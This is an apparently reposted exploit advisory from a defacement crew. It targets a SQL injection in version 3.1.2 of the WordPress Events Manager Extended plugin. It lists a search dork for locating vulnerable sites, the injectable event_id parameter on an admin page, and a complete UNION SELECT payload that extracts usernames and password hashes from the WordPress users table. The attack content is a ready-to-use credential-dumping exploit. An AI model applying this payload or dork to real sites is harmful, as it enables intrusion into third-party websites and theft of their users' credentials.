WordPress Events Manager Extended Plugin SQL Injection Vulnerability

WordPress Events Manager Extended Plugin SQL Injection Vulnerability

------------------------------------------------------------------------

# WordPress Events Manager Extended Plugin Persistent SQL Vulnerability
------------------------------------------------------------------------
# SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/
# Version     : 3.1.2
# Author      : LoocK3D
# Date        : 11 June , 2011
------------------------------------------------------------------------
[-] Dork            ; inurl:wp-admin/admin.php?page=
[-] Vulnerable File ; /wp-admin/admin.php?page=people&action=printable&event_id=[SQL]
[-] Exploit         ; -1+union+select+0,1,2,concat_ws(user_login,0x3a,user_pass)UAHCrew,4+from+dbunixwp_users--
------------------------------------------------------------------------
# UAHCrew Member : Hackeri-AL - LoocK3D - b4cKd00r ~
# Deface Archive : http://zone-h.org/archive/notifier=UAH-Crew
# UAHCrew        : uahcrew@yahoo.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
# LoocK3D        : locked.ks@gmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */

</script>

 

Fonte: http://www.exploit-db.com/exploits/17386/

Comments are closed.